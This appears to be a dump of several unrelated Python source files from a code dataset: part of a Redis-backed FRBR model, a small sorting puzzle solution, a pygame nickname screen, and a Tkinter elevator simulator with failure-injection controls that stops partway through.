                # scalar values, not for list/set properties
                setattr(self, k, v)

    def get_property(self, obj_property):
        """
        Function tries to retrieve the property from the FRBR Redis
        datastore.

        :param obj_property: Required, name of the property
        """
        return self.redis_server.hget(self.frbr_key, obj_property)

    def get_or_set_property(self, obj_property, entity=None):
        """
        Retrieves property. If entity, adds entity to set
        for the self.frbr_key

        :param obj_property: Required, name of the property
        :param entity: Optional, an entity to add as a set if multiple
                       instances of :class:`BaseModel` property exists
        """
        existing_properties = self.get_property(obj_property)
        property_key = "%s:%s" % (self.frbr_key, obj_property)
        if entity is not None:
            if existing_properties is not None:
                # BUG FIX: Redis TYPE returns the type *name* ('set'/b'set'),
                # never the Python `set` class, so the original `== set`
                # comparison was always False and multi-valued properties
                # were rebuilt on every call.
                if self.redis_server.type(existing_properties) in ('set', b'set'):
                    self.redis_server.sadd(property_key,
                                           entity)
                else:
                    # Remove property as a singleton and replace with
                    # a set, adding both existing and new entity
                    self.redis_server.hdel(self.frbr_key, obj_property)
                    property_set_key = "%s_set" % property_key
                    self.redis_server.sadd(property_set_key, existing_properties)
                    self.redis_server.sadd(property_set_key, entity)
                    self.redis_server.hset(self.frbr_key, obj_property, property_set_key)
        return self.get_property(obj_property)

    def set_property(self, obj_property, value):
        """
        Method sets property to value. If obj_property already exists
        and value is de-duped and turned into a set if needed.

        :param obj_property: name of property
        :param value: Value of property
        """
        existing_properties = self.get_property(obj_property)
        if existing_properties is None:
            if isinstance(value, list):
                if len(value) == 1:
                    # single-element list is stored as a plain scalar
                    self.redis_server.hset(self.frbr_key,
                                           obj_property,
                                           value[0])
                else:
                    # multiple values: store them in a Redis set and keep the
                    # set's key in the instance hash
                    new_redis_key = "%s:%s" % (self.frbr_key,
                                               obj_property)
                    for row in value:
                        self.redis_server.sadd(new_redis_key,
                                               row)
                    self.redis_server.hset(self.frbr_key,
                                           obj_property,
                                           new_redis_key)
            else:
                self.redis_server.hset(self.frbr_key,
                                       obj_property,
                                       value)
|
991,467 | 94fd5a7782d14b44a979d33a444b3c0675d4e446 | import itertools
# Read n (a, b) pairs from stdin, sort them by a (ties broken by b), and
# print the a-value of the first pair at which the running sum of b reaches k.
n, k = map(int, input().split())
paires = []
for _ in range(n):
    valeurs = input().split()
    paires.append((int(valeurs[0]), int(valeurs[1])))
paires.sort()
cumul = 0
for a_val, b_val in paires:
    cumul += b_val
    if cumul >= k:
        print(a_val)
        exit()
991,468 | 9ff030f2815a263074844d1cd74fce0d19d44b76 | import pygame as pg
from duchshund_walk import globals
from duchshund_walk.app_core import States
from duchshund_walk.messages import message_display
from duchshund_walk.settings import NICKNAME_MAX_LENGTH
from duchshund_walk.settings import WHITE
from duchshund_walk.settings import WORLD_HEIGH
from duchshund_walk.settings import WORLD_WIDTH
"""
Main loop
"""
class NameInput(States):
    """Screen where the player types a nickname before moving on to the menu."""

    def __init__(self):
        States.__init__(self)
        self.next = "menu"  # state entered once a nickname is confirmed
        self.color = pg.Color("black")
        self.FONT = pg.font.Font("freesansbold.ttf", 30)
        self.rect = pg.Rect(WORLD_WIDTH / 2 - 250, WORLD_HEIGH / 2, 50, 50)
        self.text = ""
        self.txt_surface = self.FONT.render(self.text, True, self.color)

    def startup(self):
        print("starting Game state stuff")

    def handle_enter_event(self):
        """Confirm the typed nickname; flag the box red when it is empty."""
        if not self.text:
            self.color = pg.Color("red")
            return
        globals.nickname = self.text
        self.done = True

    def get_event(self, event):
        """Route key presses: Enter confirms, Backspace deletes, others type."""
        if event.type == pg.KEYDOWN:
            if event.key == pg.K_RETURN:
                self.handle_enter_event()
            elif event.key == pg.K_BACKSPACE:
                self.text = self.text[:-1]
            else:
                # `<` rather than the original `!=`: if the text ever exceeded
                # the limit, `!=` would have let it keep growing unbounded
                if len(self.text) < NICKNAME_MAX_LENGTH:
                    self.text += event.unicode

    def update(self, screen):
        self.draw(screen)
        char_size = 10
        # grow the input box with the text, but never below 50 px
        box_width = max(50, self.txt_surface.get_width() + char_size)
        self.rect.w = box_width
        self.txt_surface = self.FONT.render(self.text, True, self.color)

    def draw(self, screen):
        screen.fill(WHITE)
        screen.blit(self.txt_surface, (self.rect.x + 5, self.rect.y + 5))
        text_surface = self.FONT.render("Input your nickname", True, self.color)
        rect = text_surface.get_rect()
        rect.center = (WORLD_WIDTH / 2 - 50, WORLD_HEIGH / 2 - 50)
        screen.blit(text_surface, rect)
        pg.draw.rect(screen, self.color, self.rect, 2)

    def __str__(self):
        return "NameInput"
class AboutAuthor(States):
    """Static screen showing the author's handle; any key or click leaves it."""

    def __init__(self):
        States.__init__(self)
        self.next = "details"

    def startup(self):
        print("state with author")

    def get_event(self, event):
        # leave the screen on any keyboard or mouse activity
        if event.type in (pg.KEYDOWN, pg.MOUSEBUTTONDOWN):
            self.done = True

    def update(self, screen):
        self.draw(screen)
        message_display(screen, "@noemiko", "https://github.com/noemiko ")

    def draw(self, screen):
        screen.fill(WHITE)
class WorkInProgress(States):
    """Placeholder screen for unfinished content; exits on any input event."""

    def __init__(self):
        States.__init__(self)
        self.next = "menu"

    def startup(self):
        print("starting WIP state stuff")

    def get_event(self, event):
        # any key press or mouse click dismisses the placeholder
        if event.type in (pg.KEYDOWN, pg.MOUSEBUTTONDOWN):
            self.done = True

    def update(self, screen):
        self.draw(screen)
        message_display(screen, "TODO", "todo " + globals.nickname)

    def draw(self, screen):
        screen.fill(WHITE)
|
991,469 | 4b615ac16099f42be5d47203fc43e4d46e82b8de | #!/opt/local/bin/python
import tkinter as tk
import tkinter.ttk as ttk
import sys
from random import randint
import threading
# Shared state and failure-injection flags for the elevator simulator.
globstop = 0  # set to 1 (see Lift.sortir) so every MyTimer worker thread exits
mauvaisetage = False  # failure: floor requests are redirected to a wrong floor
portes_ouvertes = 0  # door opening ratio: 1 = doors fully open, 0 = closed
portes_bloquees = False  # failure: doors are stuck at their current opening
PORTES_UN_PEU_OUVERTES = 0.5  # proportion the doors open via the "open a little" button — presumably used by the failure panel; confirm against the full file
AUTORISATION_PORTES_OUVERTES = 0.0025  # doors assumed to open over 2 m; an opening of 0.0025 of that (5 mm) is still tolerated
bouge_portes_ouvertes = False  # failure: the lift is allowed to move with doors open
mauvaisePorte = False  # failure: the wrong door side (front/back) is operated
curMouvement='0'  # movement state: '0' idle, '+' going up, '-' going down, 'p' doors open
CurTempo = 0  # tick counter used by Lift.move to pace floor-to-floor travel
class MyTimer:
    """Self-rescheduling timer.

    Runs ``target(*args, **kwargs)`` every ``tempo`` seconds after ``start()``
    is called, until ``stop()`` cancels it (or the module-level ``globstop``
    flag is set, which makes the worker thread exit on its next tick).
    """

    def __init__(self, tempo, target, args=None, kwargs=None):
        if kwargs is None:
            kwargs = {}
        if args is None:
            args = []
        self._target = target
        self._args = args
        self._kwargs = kwargs
        self._tempo = tempo
        # Created lazily by start(); kept as None so stop() is safe to call
        # even when the timer was never started (the original raised
        # AttributeError in that case).
        self._timer = None

    def _run(self):
        # global shutdown flag checked on every tick
        if globstop:
            sys.exit()
        # re-arm before invoking the target so the period stays regular
        self._timer = threading.Timer(self._tempo, self._run)
        self._timer.start()
        self._target(*self._args, **self._kwargs)

    def start(self):
        self._timer = threading.Timer(self._tempo, self._run)
        self._timer.start()

    def stop(self):
        if self._timer is not None:
            self._timer.cancel()
class descente_impossible():
    """State holder for the "descent disabled" failure switch.

    ``status()`` returns ``"enable"`` while the failure is active and
    ``"disable"`` otherwise — the exact strings the rest of the simulator
    compares against.
    """

    _ON = "enable"
    _OFF = "disable"

    def __init__(self):
        # failure starts switched off
        self.activation = self._OFF

    def activate(self):
        self.activation = self._ON

    def desactivate(self):
        self.activation = self._OFF

    def status(self):
        return self.activation
class defaillance(descente_impossible):
    """Small control window with two buttons toggling the descent failure.

    NOTE(review): as in the original, the "Désactiver descente" button is
    wired to activate() and "Activer descente" to desactivate() — kept as-is.
    """

    def __init__(self, master, descente_impossible):
        self.master = master
        self.master.geometry('200x200')
        self.master.title('Défaillance')
        self.frame = tk.Frame(self.master)
        self.buttonDesactivation = tk.Button(self.frame,
                                             text='Désactiver descente',
                                             command=descente_impossible.activate)
        self.buttonActivation = tk.Button(self.frame,
                                          text='Activer descente',
                                          command=descente_impossible.desactivate)
        self.buttonDesactivation.pack()
        self.buttonActivation.pack()
        self.frame.pack()
# Module-level singleton: rebinds the class name to an instance of it, so all
# later references to `descente_impossible` use this one shared state object.
descente_impossible = descente_impossible()
class Lift():
    """Main elevator controller and cab-button window.

    Keeps a circular buffer of up to 10 requested floors (``self.target``)
    with a write index (``CurPos``) and a serve index (``CurServed``), and
    drives the Elevator display window.  Movement state lives in the module
    global ``curMouvement``: '0' idle, '+' going up, '-' going down, 'p'
    doors open.  Several module globals inject failures (``mauvaisetage``,
    ``portes_bloquees``, ``mauvaisePorte``, ``bouge_portes_ouvertes``).
    """

    def __init__(self, master):
        self.master = master
        self.frame = tk.Frame(self.master)
        self.master.geometry('200x200')
        self.master.title('ascenseur')
        # child windows: landing panel, position display, failure panels
        self.CreerEtage()
        self.CreerElevator()
        self.CreerLouis()
        self.CreerPortes()
        self.buttonA = tk.Button(self.frame, text='Alarm')
        self.buttonA.pack()
        # cab buttons 5..1, each requesting its floor
        commandes = {5: self.Aller5, 4: self.Aller4, 3: self.Aller3,
                     2: self.Aller2, 1: self.Aller1}
        for num in (5, 4, 3, 2, 1):
            bouton = tk.Button(self.frame, text=str(num), command=commandes[num])
            bouton.pack()
            setattr(self, 'button%d' % num, bouton)
        self.frame.pack()
        self.CurEtage = 1          # current floor (1..5)
        self.target = [0] * 10     # circular request buffer (0 = empty slot)
        self.CurPos = 0            # next write slot in self.target
        self.CurServed = 0         # next slot being served
        self.UpdateColor()

    # ---- floor requests -------------------------------------------------

    def Aller5(self):
        self._demander(5, 4)

    def Aller4(self):
        self._demander(4, 3)

    def Aller3(self):
        self._demander(3, 2)

    def Aller2(self):
        self._demander(2, 1)

    def Aller1(self):
        self._demander(1, 5)

    def _demander(self, etage, etage_defaillant):
        """Shared body of Aller1..Aller5 (they differed only by constants).

        :param etage: floor actually requested
        :param etage_defaillant: floor substituted when the wrong-floor
            failure (module global ``mauvaisetage``) is active
        """
        target = etage_defaillant if mauvaisetage else etage
        if descente_impossible.status() == "enable":
            # "no descent" failure active: only accept requests at or above
            # the current floor
            if self.CurEtage <= etage:
                self._empiler(target)
        else:
            if self.CurPos < 10:
                self._empiler(target)

    def _empiler(self, target):
        """Store `target` at the write index, re-sort pending requests and
        advance the write index around the 10-slot ring."""
        self.target[self.CurPos] = target
        self.ordrePriorite()
        self.CurPos = self.CurPos + 1
        if self.CurPos == 10:
            self.CurPos = 0

    def ordrePriorite(self):
        """Bubble pending targets so floors lying on the way to the currently
        served target get served first."""
        if self.target[(self.CurServed + 1) % 10] in range(min(self.CurEtage, self.target[self.CurServed]), max(self.CurEtage, self.target[self.CurServed])):
            self.target[(self.CurServed + 1) % 10], self.target[self.CurServed] = self.target[self.CurServed], self.target[(self.CurServed + 1) % 10]
        i = self.CurServed
        while i != self.CurPos:
            if self.target[(i + 2) % 10] in range(min(self.target[i], self.target[(i + 1) % 10]), max(self.target[i], self.target[(i + 1) % 10])):
                self.target[(i + 2) % 10], self.target[(i + 1) % 10] = self.target[(i + 1) % 10], self.target[(i + 2) % 10]
            i = (i + 1) % 10

    # ---- child windows --------------------------------------------------

    def CreerEtage(self):
        self.newWindow = tk.Toplevel(self.master)
        self.Etages = Etages(self.newWindow, self)

    def CreerPortes(self):
        # NOTE(review): rebinds self.Etages (hiding the landing-panel handle)
        # and relies on Double_porte_Elio, which is defined elsewhere in the
        # project — kept exactly as the original.
        self.newWindow = tk.Toplevel(self.master)
        self.Etages = Double_porte_Elio(self.newWindow)

    def CreerElevator(self):
        self.newWindow = tk.Toplevel(self.master)
        self.Elevator = Elevator(self.newWindow)

    def CreerLouis(self):
        self.newWindow = tk.Toplevel(self.master)
        self.DefaillanceLouis = Defaillance_Louis_Eloise_Jules(self.newWindow, self.Elevator, descente_impossible)

    # ---- periodic tick --------------------------------------------------

    def move(self):
        """Timer tick: refresh the display every call and, every 50 ticks,
        advance the elevator state machine by one step."""
        global portes_ouvertes, bouge_portes_ouvertes, curMouvement, CurTempo
        self._rafraichir()
        # clamp the floor into the physical range and stop on overshoot
        if self.CurEtage > 5:
            self.CurEtage = 5
            curMouvement = '0'
        if self.CurEtage < 1:
            self.CurEtage = 1
            curMouvement = '0'
        CurTempo = CurTempo + 1
        if CurTempo == 50 or CurTempo == 0:  # paces the travel between floors
            if curMouvement == '0':
                self._choisir_mouvement()
            # doors (almost) closed, or the moving-with-open-doors failure on
            if portes_ouvertes < AUTORISATION_PORTES_OUVERTES or bouge_portes_ouvertes == True:
                if curMouvement == 'p':
                    self._choisir_mouvement()
            if curMouvement == '+':
                self.CurEtage = self.CurEtage + 1
                self._arrivee()
            if curMouvement == '-':
                self.CurEtage = self.CurEtage - 1
                self._arrivee()
            self._rafraichir()
            CurTempo = 0

    def _rafraichir(self):
        """Redraw: full update normally; when the doors are blocked only the
        red/green door state is refreshed."""
        if portes_bloquees == False:
            self.UpdateColor()
        else:
            if portes_ouvertes < AUTORISATION_PORTES_OUVERTES:
                self.doorRed()
            else:
                self.doorGreen()

    def _choisir_mouvement(self):
        """Pick the next movement toward the currently served target."""
        global curMouvement
        if self.target[self.CurServed] > 0:
            if self.CurEtage < self.target[self.CurServed]:
                curMouvement = '+'
                if portes_bloquees == False:
                    self.UpdateColor()
            if self.CurEtage > self.target[self.CurServed]:
                curMouvement = '-'
                if portes_bloquees == False:
                    self.UpdateColor()
            if self.target[self.CurServed] == self.CurEtage:
                # already at the target: just advance the serve index
                self.CurServed = self.CurServed + 1
                if self.CurServed == 10:
                    self.CurServed = 0

    def _arrivee(self):
        """After one floor of travel, open the doors if the served target is
        reached and advance the serve index around the ring."""
        global curMouvement
        if self.CurEtage == self.target[self.CurServed]:
            curMouvement = 'p'
            self.target[self.CurServed] = 0
            self.CurServed = self.CurServed + 1
            if self.CurServed == 10:
                self.CurServed = 0

    # ---- display --------------------------------------------------------

    def _statut_porte(self):
        """Door side (0 = back, 1 = front) for the current floor, read from
        the module-level `portes` table (defined elsewhere — confirm) and
        inverted when the wrong-door failure (`mauvaisePorte`) is active."""
        statut = portes[self.CurEtage - 1]
        if mauvaisePorte == True:
            statut = 1 if statut == 0 else 0
        return statut

    def _allumer(self, couleur, autre_etage=None, couleur_autre='bleu'):
        """Color the current floor indicator `couleur`, optionally floor
        `autre_etage` in `couleur_autre`, and every remaining floor black.

        Replaces the original per-floor elif chains; like them, it does
        nothing when the current floor is outside 1..5."""
        if not (1 <= self.CurEtage <= 5):
            return
        for etage in range(1, 6):
            if etage == self.CurEtage:
                nom = couleur
            elif autre_etage is not None and etage == autre_etage:
                nom = couleur_autre
            else:
                nom = 'noir'
            # dispatch to Elevator.rouge1() .. Elevator.noir5()
            getattr(self.Elevator, '%s%d' % (nom, etage))()

    def UpdateColor(self):
        """Refresh the Elevator window according to curMouvement."""
        global portes_ouvertes, portes_bloquees, curEtage, curMouvement, CurTempo
        curEtage = self.CurEtage
        self.Elevator.check_Changes()
        if curMouvement == '0':
            if portes_bloquees == False:
                portes_ouvertes = 0
            self.doorRed()
        elif curMouvement == 'p':
            if portes_bloquees == False:
                portes_ouvertes = 1
            self.doorGreen()
            self.Elevator.Door_To_Green(self.CurEtage, self._statut_porte())
        elif curMouvement == '+':
            if portes_bloquees == False:
                portes_ouvertes = 0
            if 1 <= self.CurEtage <= 4:
                # going up: current floor orange, next floor blue
                self._allumer('orange', self.CurEtage + 1)
            self.Elevator.Door_To_Red(self.CurEtage, self._statut_porte())
        elif curMouvement == '-':
            if portes_bloquees == False:
                portes_ouvertes = 0
            if 2 <= self.CurEtage <= 5:
                if descente_impossible.status() == "enable":
                    # descent disabled: flag the current floor red
                    self._allumer('rouge')
                else:
                    # going down: current floor orange, floor below blue
                    self._allumer('orange', self.CurEtage - 1)
            self.Elevator.Door_To_Red(self.CurEtage, self._statut_porte())

    def doorGreen(self):
        """Doors open: current floor indicator green, others black; when the
        doors are open enough and the cab may idle, return to the idle state."""
        global curMouvement
        self._allumer('vert')
        if (portes_ouvertes >= AUTORISATION_PORTES_OUVERTES and bouge_portes_ouvertes == False and (
                CurTempo == 25 or CurTempo == 75)):
            curMouvement = '0'

    def doorRed(self):
        """Doors closed: current floor indicator red, others black."""
        self._allumer('rouge')
        self.Elevator.Door_To_Red(self.CurEtage, self._statut_porte())

    def sortir(self):
        """Signal every MyTimer thread to stop and exit the process."""
        global globstop
        globstop = 1
        sys.exit(1)
class Etages(Lift):
    """Landing call panel: an up ('^') and a down ('v') button per floor,
    both wired to the controller's AllerN method for that floor."""

    def __init__(self, master, Lift):
        self.master = master
        self.frame = tk.Frame(self.master)
        self.master.geometry('200x200')
        self.master.title('Etages')
        actions = {5: Lift.Aller5, 4: Lift.Aller4, 3: Lift.Aller3,
                   2: Lift.Aller2, 1: Lift.Aller1}
        # creation/pack order matches the original: 5 ^, 5 v, 4 ^, ... 1 v
        for floor in (5, 4, 3, 2, 1):
            for suffix, arrow in (('u', '^'), ('d', 'v')):
                bouton = tk.Button(self.frame,
                                   text='%d %s' % (floor, arrow),
                                   command=actions[floor])
                bouton.pack()
                setattr(self, 'button%d%s' % (floor, suffix), bouton)
        self.master.geometry("+200+200")
        self.frame.pack()

    def close_windows(self):
        self.master.destroy()
class Elevator:
    """'Position' window: one row per floor with a colored floor indicator
    button (#_N_#) flanked by a back (BN) and a front (FN) door button."""

    def __init__(self, master):
        self.master = master
        self.frame = tk.Frame(self.master)
        self.master.geometry('200x200')
        self.master.title('Position')
        style = ttk.Style()
        style.configure("TButton", padding=(0, 5, 0, 5))
        style.configure("Red.TButton", foreground='red')
        style.configure("Blue.TButton", foreground='blue')
        style.configure("Green.TButton", foreground='green')
        style.configure("Orange.TButton", foreground='orange')
        # BUG FIX: the original configured "Black.Tbutton" (lowercase 'b'),
        # so the "Black.TButton" style used by the noirN methods was never
        # actually set up.
        style.configure("Black.TButton", foreground='black')
        # one identical row of widgets per floor, top (5) down to bottom (1)
        initial_styles = {5: "Red.TButton", 4: "Blue.TButton",
                          3: "Green.TButton", 2: "Orange.TButton",
                          1: "Black.TButton"}
        for num in (5, 4, 3, 2, 1):
            row = tk.Frame(self.frame)
            floor_btn = ttk.Button(row, text='#_%d_#' % num)
            back_btn = ttk.Button(row, text='B%d' % num)
            front_btn = ttk.Button(row, text='F%d' % num)
            back_btn.pack(side=tk.LEFT)
            front_btn.pack(side=tk.RIGHT)
            floor_btn.pack(side=tk.RIGHT)
            floor_btn.configure(style=initial_styles[num])
            row.pack(expand=True)
            # keep the original public attribute names
            setattr(self, 'frame%d' % num, row)
            setattr(self, 'button%d' % num, floor_btn)
            setattr(self, 'button%d_back' % num, back_btn)
            setattr(self, 'button%d_front' % num, front_btn)
        self.master.geometry("+400+200")
        self.frame.pack()

    def _paint(self, num, style_name):
        """Re-style (and re-pack, as the original did) one floor indicator."""
        bouton = getattr(self, 'button%d' % num)
        bouton.configure(style=style_name)
        bouton.pack()

    # ---- per-floor color setters (public interface kept verbatim) -------

    def rouge5(self):
        self._paint(5, "Red.TButton")

    def bleu5(self):
        self._paint(5, "Blue.TButton")

    def vert5(self):
        self._paint(5, "Green.TButton")

    def orange5(self):
        self._paint(5, "Orange.TButton")

    def noir5(self):
        self._paint(5, "Black.TButton")

    def rouge4(self):
        self._paint(4, "Red.TButton")

    def bleu4(self):
        self._paint(4, "Blue.TButton")

    def vert4(self):
        self._paint(4, "Green.TButton")

    def orange4(self):
        self._paint(4, "Orange.TButton")

    def noir4(self):
        self._paint(4, "Black.TButton")

    def rouge3(self):
        self._paint(3, "Red.TButton")

    def bleu3(self):
        self._paint(3, "Blue.TButton")

    def vert3(self):
        self._paint(3, "Green.TButton")

    def orange3(self):
        self._paint(3, "Orange.TButton")

    def noir3(self):
        self._paint(3, "Black.TButton")

    def rouge2(self):
        self._paint(2, "Red.TButton")

    def bleu2(self):
        self._paint(2, "Blue.TButton")

    def vert2(self):
        self._paint(2, "Green.TButton")

    def orange2(self):
        self._paint(2, "Orange.TButton")

    def noir2(self):
        self._paint(2, "Black.TButton")

    def rouge1(self):
        self._paint(1, "Red.TButton")

    def bleu1(self):
        self._paint(1, "Blue.TButton")

    def vert1(self):
        self._paint(1, "Green.TButton")

    def orange1(self):
        self._paint(1, "Orange.TButton")

    def noir1(self):
        self._paint(1, "Black.TButton")

    # ---- door highlighting ----------------------------------------------

    def _door_button(self, etage, statut):
        """Return the back (statut == 0) or front (statut == 1) door button
        for floor `etage`, or None when out of range (the original elif
        chains — which also contained dead duplicate `etage == 3` branches —
        silently did nothing in that case)."""
        if etage not in (1, 2, 3, 4, 5) or statut not in (0, 1):
            return None
        side = 'back' if statut == 0 else 'front'
        return getattr(self, 'button%d_%s' % (etage, side))

    def Door_To_Green(self, etage, statut):
        bouton = self._door_button(etage, statut)
        if bouton is not None:
            bouton.configure(style="chosen.TButton")

    def Door_To_Red(self, etage, statut):
        bouton = self._door_button(etage, statut)
        if bouton is not None:
            bouton.configure(style="unchosen.TButton")

    def check_Changes(self):
        """Reset a floor's two door buttons to the neutral "blank" style when
        both carry the same chosen/unchosen marking.

        configure().get('style') returns the option's configuration tuple;
        the `in` test is the same exact-element membership the original
        expressed via __contains__."""
        for num in range(1, 6):
            back = getattr(self, 'button%d_back' % num)
            front = getattr(self, 'button%d_front' % num)
            back_cfg = back.configure().get('style')
            front_cfg = front.configure().get('style')
            if "unchosen.TButton" in back_cfg and "unchosen.TButton" in front_cfg:
                back.configure(style="blank.TButton")
                front.configure(style="blank.TButton")
            elif "chosen.TButton" in back_cfg and "chosen.TButton" in front_cfg:
                back.configure(style="blank.TButton")
                front.configure(style="blank.TButton")
class Defaillance_Louis_Eloise_Jules():
    """Tk window for injecting failures into the elevator simulation.

    Three panels: door failures (Louis), floor failures (Eloise) and movement
    failures (Jules).  The handlers communicate with the simulator through
    module-level globals (portes, curEtage, curMouvement, portes_ouvertes,
    mauvaisetage, mauvaisePorte, portes_bloquees, bouge_portes_ouvertes, ...).
    """
    def __init__(self, master,Elevator,descente_impossible):
        # master: parent Tk window; Elevator: the simulated elevator object;
        # descente_impossible: failure object that can forbid descending.
        self.master = master
        self.frame = tk.Frame(self.master)
        self.frame.grid_rowconfigure(1, weight=1)
        self.frame.grid_columnconfigure(2, weight=1)
        self.master.geometry('600x300')
        self.Elevator = Elevator
        self.descente_impossible=descente_impossible
        self.master.title('Defaillances')
        # --- door-failure panel (Louis) ---
        self.frame_Louis = tk.Frame(self.frame)
        self.display_Louis = tk.Label(self.frame_Louis, text=' Défaillances portes ',background ='light grey', height =2,font=("Arial",12,'bold'))
        self.display_Louis.pack(fill='x')
        self.button1 = ttk.Button(self.frame_Louis, text='fermer les portes manuellement', command=self.fPortes)
        self.button1.pack(fill='x')
        self.button2 = ttk.Button(self.frame_Louis, text='ouvrir les portes manuellement', command=self.ouvPortes)
        self.button2.pack(fill='x')
        self.button3 = ttk.Button(self.frame_Louis, text='ouvrir un peu les portes manuellement', command=self.ouvUnPeuPortes)
        self.button3.pack(fill='x')
        self.button4 = ttk.Button(self.frame_Louis, text='bloquer les portes', command=self.bloquerPortes)
        self.button4.configure(style="unchosen_new.TButton")
        self.button4.pack(fill='x')
        self.button5 = ttk.Button(self.frame_Louis, text='debloquer les portes manuellement', command=self.debloquerPortes)
        self.button5.pack(fill='x')
        self.button6 = ttk.Button(self.frame_Louis, text='l\'ascenceur bouge avec les portes ouvertes',command=self.bougePortesOuvertes)
        self.button6.configure(style="unchosen_new.TButton")
        self.button6.pack()
        self.frame_Louis.configure(highlightbackground="white", highlightthickness=2)
        self.frame_Louis.grid(row=0,column=1, sticky="ne")
        # --- floor-failure (Eloise) and movement-failure (Jules) panels ---
        self.frame_Eloise_Jules = tk.Frame(self.frame)
        self.frame_Eloise = tk.Frame(self.frame_Eloise_Jules)
        self.frame_Eloise.configure(highlightbackground="white", highlightthickness=2)
        self.display_Eloise = tk.Label(self.frame_Eloise, text=' Défaillances étages ',background ='light grey', height =2,font=("Arial",12,'bold'))
        self.display_Eloise.pack(fill='x')
        self.button7 = ttk.Button(self.frame_Eloise, text='activer / désactiver la défaillance mauvais étage',command=self.def_etage)
        self.button7.configure(style="unchosen_new.TButton")
        self.button7.pack(fill='x')
        self.frame_Eloise.pack()
        self.frame_Jules = tk.Frame(self.frame_Eloise_Jules)
        self.frame_Jules.configure(highlightbackground="white", highlightthickness=2)
        self.display_Jules = tk.Label(self.frame_Jules, text=' Défaillances mouvement ', background='light grey',height=2, font=("Arial", 12, 'bold'))
        self.display_Jules.pack(fill='x')
        self.buttonDesactivation = ttk.Button(self.frame_Jules, text='Désactiver descente',command=self.desc_desactivate)
        self.buttonDesactivation.pack(fill='x')
        self.buttonActivation = ttk.Button(self.frame_Jules, text='Activer descente', command=self.desc_activate)
        self.buttonActivation.pack(fill='x')
        self.frame_Jules.pack(fill='x')
        self.frame_Eloise_Jules.grid(row=0, column=0, sticky='nw')
        self.frame.pack()
        # Descent is enabled by default.
        self.desc_activate()
    def desc_desactivate(self):
        """Forbid descending (activate the 'descente impossible' failure)."""
        # NOTE(review): uses the module-level `descente_impossible`, not
        # self.descente_impossible — confirm the aliasing is intended.
        descente_impossible.activate()
        # Double_porte_Elio.button_color only touches its two button args,
        # so it is safe to call it with a foreign `self` here.
        Double_porte_Elio.button_color(self,self.buttonDesactivation,self.buttonActivation)
    def desc_activate(self):
        """Allow descending again (deactivate the failure)."""
        descente_impossible.desactivate()
        Double_porte_Elio.button_color(self,self.buttonActivation,self.buttonDesactivation)
    def def_etage(self):
        """Toggle the 'wrong floor' failure and recolor the toggle button."""
        global mauvaisetage
        if mauvaisetage == False:
            mauvaisetage = True
            self.button7.configure(style="chosen_new.TButton")
        else:
            mauvaisetage = False
            self.button7.configure(style="unchosen_new.TButton")
    def fPortes(self):
        """Manually close the doors at the current floor."""
        global portes_ouvertes, curMouvement, CurTempo
        portes_ouvertes = 0
        CurTempo = 0
        if curMouvement=='p':
            curMouvement='0'
        # statut: which of the two doors (0/1) is programmed at this floor.
        statut = portes[curEtage - 1]
        # With the 'wrong door' failure active, act on the opposite door.
        if mauvaisePorte == True:
            if statut == 0:
                statut = 1
            else:
                statut = 0
        Elevator.Door_To_Red(self.Elevator,curEtage, statut)
    def ouvPortes(self):
        """Manually open the doors at the current floor."""
        global portes_ouvertes, curMouvement, CurTempo
        portes_ouvertes = 1
        CurTempo=0
        if curMouvement!='p':
            curMouvement='p'
        statut = portes[curEtage - 1]
        # With the 'wrong door' failure active, act on the opposite door.
        if mauvaisePorte == True:
            if statut == 0:
                statut = 1
            else:
                statut = 0
        Elevator.Door_To_Green(self.Elevator,curEtage, statut)
    def ouvUnPeuPortes(self):
        """Open the doors only partially (PORTES_UN_PEU_OUVERTES fraction)."""
        global portes_ouvertes, curMouvement, CurTempo, PORTES_UN_PEU_OUVERTES
        CurTempo = 0
        if curMouvement != 'p':
            curMouvement = 'p'
        statut = portes[curEtage - 1]
        if mauvaisePorte == True:
            if statut == 0:
                statut = 1
            else:
                statut = 0
        Elevator.Door_To_Green(self.Elevator, curEtage, statut)
        portes_ouvertes = PORTES_UN_PEU_OUVERTES
        print("portes ouvertes à " + str(PORTES_UN_PEU_OUVERTES * 100) + "%")
    def bloquerPortes(self):
        """Block the doors (they can no longer move)."""
        global portes_bloquees
        portes_bloquees = True
        self.button4.configure(style="chosen_new.TButton")
    def debloquerPortes(self):
        """Unblock the doors."""
        global portes_bloquees
        portes_bloquees = False
        self.button4.configure(style="unchosen_new.TButton")
    def bougePortesOuvertes(self):
        """Toggle the 'elevator moves with doors open' failure."""
        global bouge_portes_ouvertes
        if bouge_portes_ouvertes==False :
            bouge_portes_ouvertes = True
            self.button6.configure(style="chosen_new.TButton")
        else :
            bouge_portes_ouvertes = False
            self.button6.configure(style="unchosen_new.TButton")
class Double_porte_Elio :
    """Tk window to choose, per floor, which of the two doors is 'programmed'
    (0 = left, 1 = right) and to toggle the 'wrong door opens' failure.

    The per-floor selection is published through the module-level `portes`
    list so the simulator can read it; the failure flag is published through
    the module-level `mauvaisePorte` boolean.
    """
    def __init__(self, master):
        self.master = master
        self.frame = tk.Frame(self.master)
        # 0 -> left door programmed, 1 -> right door (initial state);
        # one index per floor.
        self.portes = [0,0,0,0,0]
        global portes
        self.master.geometry('215x260')
        # Expose the selection list to the rest of the simulator.
        portes = self.portes
        self.master.title('Defaillances double portes Elio')
        self.display = tk.Label(self.frame, text='Choose on which side the door is')
        self.display.pack()
        # ttk styles shared with the other failure windows:
        # chosen/unchosen (_new) color the active/inactive choice.
        plus = ttk.Style()
        plus.map("chosen_new.TButton", foreground=[('pressed', 'green'), ('active', 'silver'),('!disabled','green')],background=[('pressed', '!disabled', 'green')] )
        plus.map("unchosen_new.TButton", foreground=[('pressed', 'firebrick'), ('active', 'silver'),('!disabled','firebrick')],background=[('pressed', '!disabled', 'green')])
        plus.configure("TButton", padding=(0, 5, 0, 5))
        plus.configure("chosen.TButton",foreground='green')
        plus.configure("unchosen.TButton", foreground='firebrick')
        plus.configure("blank.TButton", foreground='black')
        # ----------------------(Buttons 5)---------------------- #
        self.frame5 = tk.Frame(self.frame)
        self.button5L = ttk.Button(self.frame5, text='Left')
        self.button5R = ttk.Button(self.frame5, text='Right')
        self.button5R.configure(command=self.porte_R5)
        self.button5L.configure(command=self.porte_L5)
        self.display_5 = tk.Label(self.frame5, text=' #_5_# ')
        self.button5L.pack(side=tk.LEFT)
        self.button5R.pack(side=tk.RIGHT)
        self.display_5.pack(side=tk.RIGHT)
        self.frame5.pack(expand=True)
        # ----------------------(Buttons 4)---------------------- #
